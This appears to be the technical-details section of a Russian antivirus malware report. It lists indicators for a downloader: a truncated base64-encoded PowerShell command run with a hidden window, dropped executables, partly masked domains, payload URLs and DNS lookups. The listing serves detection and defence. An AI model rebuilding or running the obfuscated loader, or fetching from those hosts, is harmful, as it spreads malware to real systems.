Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\849394.cvr
- %HOMEPATH%\498.exe
- 'ba####hinhphap.com':443
- 'ds###coa.com':80
- 'ds###coa.com':443
- 'co#####lingmassage.com':80
- 'nh###nhvina.xyz':80
- http://ds###coa.com/css/ptk903/
- http://nh###nhvina.xyz/36e/nnrm97524/
- 'ba####hinhphap.com':443
- 'ds###coa.com':443
- DNS ASK ba####hinhphap.com
- DNS ASK ds###coa.com
- DNS ASK co#####lingmassage.com
- DNS ASK de####icihatasi.com
- DNS ASK nh###nhvina.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...' (со скрытым окном)